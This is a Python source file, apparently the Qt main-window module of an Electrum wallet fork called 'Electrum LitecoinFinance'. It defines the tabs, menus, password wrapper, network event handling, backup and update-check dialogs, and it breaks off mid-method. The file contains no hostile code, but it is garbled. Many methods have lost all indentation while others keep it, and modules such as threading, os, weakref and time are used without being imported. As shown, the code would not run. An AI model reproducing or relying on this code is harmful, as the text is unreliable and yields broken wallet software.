import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
if TYPE_CHECKING:
    from . import ElectrumGui

# Presumably the retry budget for lightning payments -- confirm at call sites.
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
    """Small icon-only button for the status bar; invokes ``func`` on click
    or on Return/Enter."""
    # note: this class has a custom stylesheet applied in stylesheet_patcher.py
    def __init__(self, icon, tooltip, func):
        QToolButton.__init__(self)
        self.setText('')
        self.setIcon(icon)
        self.setToolTip(tooltip)
        self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.setAutoRaise(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25,25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # Also activate via keyboard, like a default button.
        if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
            self.func()
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # Keep prompting until the entered password verifies against the
        # keystore (the loop body is skipped entirely when the wallet has no
        # keystore encryption, leaving password=None).
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
    """Main wallet window; one instance per open wallet."""
    # Qt signals used to marshal events from worker/network threads onto
    # the GUI thread (Qt widgets must only be touched from the GUI thread).
    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)
    #ln_payment_attempt_signal = pyqtSignal(str)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()
    show_error_signal = pyqtSignal(str)
    # BIP70 payment request currently being processed, if any.
    payment_request: Optional[paymentrequest.PaymentRequest]
    def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
        """Build the window for *wallet*: all tabs, menus, status bar,
        network-callback wiring, and the periodic update-check thread."""
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        assert wallet, "no wallet"
        self.wallet = wallet
        if wallet.has_lightning():
            self.wallet.config.set_key('show_channels_tab', True)
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self._cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.payto_URI = None
        self.checking_accounts = False
        self.qr_window = None
        self.pluginsdialog = None
        self.showing_cert_mismatch_error = False
        self.tl_windows = []
        self.pending_invoice = None
        Logger.__init__(self)
        # New incoming txs are queued here and drained by notify_transactions().
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0
        self.create_status_bar()
        self.need_update = threading.Event()
        self.completions = QStringListModel()
        coincontrol_sb = self.create_coincontrol_statusbar()
        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        self.channels_tab = self.create_channels_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
        # Optional tabs are added only when enabled in the config; tab_pos
        # records the canonical ordering used later by toggle_tab().
        def add_optional_tab(tabs, tab, icon, description, name):
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))
        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        central_widget = QWidget()
        vbox = QVBoxLayout(central_widget)
        vbox.setContentsMargins(0, 0, 0, 0)
        vbox.addWidget(tabs)
        vbox.addWidget(coincontrol_sb)
        self.setCentralWidget(central_widget)
        if self.config.get("is_maximized"):
            self.showMaximized()
        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()
        # weakref proxy so the shortcuts' lambdas don't keep the tabs alive
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        for i in range(wrtabs.count()):
            # i=i default binds the loop variable (avoids late-binding bug)
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.show_error_signal.connect(self.show_error)
        self.history_list.setFocus(True)
        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
                         'on_history', 'channel', 'channels_updated',
                         'payment_failed', 'payment_succeeded',
                         'invoice_status', 'request_status', 'ln_gossip_sync_progress',
                         'cert_mismatch', 'gossip_db_loaded']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            util.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
        # update fee slider in case we missed the callback
        #self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()
        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = self.question(title="Electrum LitecoinFinance - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum LitecoinFinance.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum LitecoinFinance available?"))
            config.set_key('check_updates', bool(choice), save=True)
        self._update_check_thread = None
        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
            def on_version_received(v):
                if UpdateCheck.is_newer(v):
                    self.update_check_button.setText(_("Update to Electrum LitecoinFinance {} is available").format(v))
                    self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                    self.update_check_button.show()
            self._update_check_thread = UpdateCheckThread()
            self._update_check_thread.checked.connect(on_version_received)
            self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
    def on_network_qt(self, event, args=None):
        """Dispatch a network event on the GUI thread.

        Events that carry a wallet in args[0] are filtered so that only
        events for this window's wallet are acted upon.
        """
        # Handle a network message in the GUI thread
        # note: all windows get events from all wallets!
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                # queued; drained later by notify_transactions()
                self.tx_notification_queue.put(tx)
        elif event == 'on_quotes':
            self.on_fx_quotes()
        elif event == 'on_history':
            self.on_fx_history()
        elif event == 'gossip_db_loaded':
            self.channels_list.gossip_db_loaded.emit(*args)
        elif event == 'channels_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_rows.emit(*args)
        elif event == 'channel':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_single_row.emit(*args)
                self.update_status()
        elif event == 'request_status':
            self.on_request_status(*args)
        elif event == 'invoice_status':
            self.on_invoice_status(*args)
        elif event == 'payment_succeeded':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_succeeded(*args)
        elif event == 'payment_failed':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_failed(*args)
        elif event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            # no-op: fee estimates are read on demand
            pass
        elif event == 'fee_histogram':
            self.history_model.on_fee_histogram()
        elif event == 'ln_gossip_sync_progress':
            self.update_lightning_icon()
        elif event == 'cert_mismatch':
            self.show_cert_mismatch_error()
        else:
            self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet: Abstract_Wallet):
        """Finish window initialization once *wallet* is available:
        spawn its task thread, refresh all menus/views, and show the window."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        if wallet.has_lightning():
            util.trigger_callback('channels_updated', wallet)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.channels_list.update()
        self.tabs.show()
        self.init_geometry()
        # start hidden in the tray if requested and the tray is available
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum LitecoinFinance Testnet" if constants.net.TESTNET else "Electrum LitecoinFinance"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
    def backup_wallet(self):
        """Ask for a backup directory and copy the wallet file there.

        Returns True on success, False if the dialog was cancelled, and
        None if no backup directory is configured or the copy failed
        (callers currently ignore the return value).
        """
        d = WindowModalDialog(self, _("File Backup"))
        vbox = QVBoxLayout(d)
        grid = QGridLayout()
        backup_help = ""
        backup_dir = self.config.get('backup_dir')
        backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
        msg = _('Please select a backup directory')
        if self.wallet.has_lightning() and self.wallet.lnworker.channels:
            msg += '\n\n' + ' '.join([
                _("Note that lightning channels will be converted to channel backups."),
                _("You cannot use channel backups to perform lightning payments."),
                _("Channel backups can only be used to request your channels to be closed.")
            ])
        self.backup_dir_e = QPushButton(backup_dir)
        self.backup_dir_e.clicked.connect(self.select_backup_dir)
        grid.addWidget(backup_dir_label, 1, 0)
        grid.addWidget(self.backup_dir_e, 1, 1)
        vbox.addLayout(grid)
        vbox.addWidget(WWLabel(msg))
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return False
        # re-read: the user may have changed it via select_backup_dir()
        backup_dir = self.config.get_backup_dir()
        if backup_dir is None:
            self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
            return
        try:
            new_path = self.wallet.save_backup(backup_dir)
        except BaseException as reason:
            self.show_critical(_("Electrum LitecoinFinance was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
            return
        msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
        self.show_message(msg, title=_("Wallet backup created"))
        return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
    def init_menubar(self):
        """Build the full menu bar (File/Wallet/View/Tools/Help) and keep
        references to the actions that are toggled elsewhere
        (e.g. by watching_only_changed)."""
        menubar = QMenuBar()
        file_menu = menubar.addMenu(_("&File"))
        self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
        file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
        file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
        file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
        file_menu.addAction(_("Delete"), self.remove_wallet)
        file_menu.addSeparator()
        file_menu.addAction(_("&Quit"), self.close)
        wallet_menu = menubar.addMenu(_("&Wallet"))
        wallet_menu.addAction(_("&Information"), self.show_wallet_info)
        wallet_menu.addSeparator()
        # these actions are enabled/hidden later depending on wallet abilities
        self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
        self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
        self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
        self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
        self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
        self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
        self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
        wallet_menu.addSeparator()
        addresses_menu = wallet_menu.addMenu(_("&Addresses"))
        addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
        labels_menu = wallet_menu.addMenu(_("&Labels"))
        labels_menu.addAction(_("&Import"), self.do_import_labels)
        labels_menu.addAction(_("&Export"), self.do_export_labels)
        history_menu = wallet_menu.addMenu(_("&History"))
        history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
        history_menu.addAction(_("&Summary"), self.history_list.show_summary)
        history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
        history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
        contacts_menu = wallet_menu.addMenu(_("Contacts"))
        contacts_menu.addAction(_("&New"), self.new_contact_dialog)
        contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
        contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
        invoices_menu = wallet_menu.addMenu(_("Invoices"))
        invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
        invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
        requests_menu = wallet_menu.addMenu(_("Requests"))
        requests_menu.addAction(_("Import"), lambda: self.import_requests())
        requests_menu.addAction(_("Export"), lambda: self.export_requests())
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
        # View menu: one show/hide toggle per optional tab
        def add_toggle_action(view_menu, tab):
            is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
            item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
            tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
        view_menu = menubar.addMenu(_("&View"))
        add_toggle_action(view_menu, self.addresses_tab)
        add_toggle_action(view_menu, self.utxo_tab)
        add_toggle_action(view_menu, self.channels_tab)
        add_toggle_action(view_menu, self.contacts_tab)
        add_toggle_action(view_menu, self.console_tab)
        tools_menu = menubar.addMenu(_("&Tools"))  # type: QMenu
        preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog)  # type: QAction
        if sys.platform == 'darwin':
            # "Settings"/"Preferences" are all reserved keywords in macOS.
            # preferences_action will get picked up based on name (and put into a standardized location,
            # and given a standard reserved hotkey)
            # Hence, this menu item will be at a "uniform location re macOS processes"
            preferences_action.setMenuRole(QAction.PreferencesRole)  # make sure OS recognizes it as preferences
            # Add another preferences item, to also have a "uniform location for Electrum between different OSes"
            tools_menu.addAction(_("Electrum LitecoinFinance preferences"), self.settings_dialog)
        tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
        if self.network and self.network.local_watchtower:
            tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
        tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
        tools_menu.addSeparator()
        tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
        tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
        tools_menu.addSeparator()
        paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
        raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
        raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
        raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
        raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
        raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
        self.raw_transaction_menu = raw_transaction_menu
        run_hook('init_menubar_tools', self, tools_menu)
        help_menu = menubar.addMenu(_("&Help"))
        help_menu.addAction(_("&About"), self.show_about)
        help_menu.addAction(_("&Check for updates"), self.show_update_check)
        help_menu.addAction(_("&Official website"), lambda: webopen("https://ltfn.scalaris.info"))
        help_menu.addSeparator()
        help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
        if not constants.net.TESTNET:
            help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
        help_menu.addAction(_("&Report Bug"), self.show_report_bug)
        help_menu.addSeparator()
        help_menu.addAction(_("&Donate to server"), self.donate_to_server)
        self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('litecoinfinance:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTFN",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
    def show_bitcoin_paper(self):
        """Open the Bitcoin whitepaper, fetching it from the blockchain on
        first use and caching it as bitcoin.pdf in the config dir."""
        filename = os.path.join(self.config.path, 'bitcoin.pdf')
        if not os.path.exists(filename):
            # the well-known tx that embeds the whitepaper PDF in its outputs
            s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
            if not s:
                return
            # Reassemble the PDF hex from the raw tx: split on the output-value
            # marker, then strip the script framing around each data chunk.
            # NOTE(review): the slice offsets look hand-derived for this exact
            # tx layout — verify against the known-good PDF if this is touched.
            s = s.split("0100000000000000")[1:-1]
            out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
            with open(filename, 'wb') as f:
                f.write(bytes.fromhex(out))
        webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum LitecoinFinance (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum LitecoinFinance - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
